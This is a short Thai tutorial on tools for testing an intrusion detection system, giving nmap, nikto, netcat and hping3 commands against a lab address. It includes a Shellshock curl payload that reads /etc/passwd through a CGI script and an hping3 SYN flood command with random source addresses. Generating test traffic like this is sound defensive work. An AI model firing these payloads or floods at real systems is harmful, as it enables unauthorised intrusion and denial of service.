### มารู้จักเครื่องมือในการทดสอบระบบ IDS

---
<br>

**เครื่องมือต่างๆ เบื้องต้นที่ใช้ในการทดสอบ ดังนี้**
| ตัวแปร | รายละเอียด |
|---|---|
| **nmap** | ใช้สำหรับ**การสแกนพอร์ต**เครื่องเป้าหมาย เพื่อ**หาพอร์ตที่เปิดให้บริการ** (Port Scanner) |
| **nikto** | ใช้สำหรับ**สแกนหาช่องโหว่**ของ**เว็บ** (Web Vulnerability Scanner) |
| **Owasp Zap** | ใช้สำหรับ**สแกนหาช่องโหว่**ของ**เว็บ** (Web Vulnerability Scanner) |
| **nc / netcat** | ใช้สำหรับ**ส่งทราฟฟิก** เพื่อทดสอบพอร์ต**ทั้งที่เปิดและไม่เปิด**ให้บริการ |
| **nessus / openvas**| ใช้สำหรับ**สแกนช่องโหว่พอร์ต** ที่เปิดให้บริการ (Vulnerability Scanner) |
| **hydra** | ใช้สำหรับ**เดารหัสผ่านระบบที่ให้ใส่รหัส** (Brute force Attack) **เช่น** Web Login, FTP, Mail ฯลฯ |
| **hping** | ใช้สำหรับ**สร้างแพ็คเก็ตต่างๆ** **เช่น** Syn attack ฯลฯ |
<br>

---
<br>

**ตัวอย่างการติดตั้งบางเครื่องมือเพื่อทดสอบระบบ IDS**

```
sudo apt install nmap nikto netcat hping3
```
<br>

---
<br>

**ตัวอย่างคำสั่งที่ใช้ในการทดสอบ**

```
# NMAP (PortScan)
sudo nmap 10.0.2.15
sudo nmap -sS 10.0.2.15  # TCP Scan
sudo nmap -sU 10.0.2.15  # UDP Scan

# NIKTO (WebScan)
nikto -h 10.0.2.15 -C all

# Netcat (Test send trafic)
nc 10.0.2.15 21
nc 10.0.2.15 22
nc 10.0.2.15 80

# Curl
curl -A "() { :; }; echo;/bin/cat /etc/passwd" http://10.0.2.15/cgi-bin/testbash.cgi

# Hping3
sudo hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 10.0.2.15

```
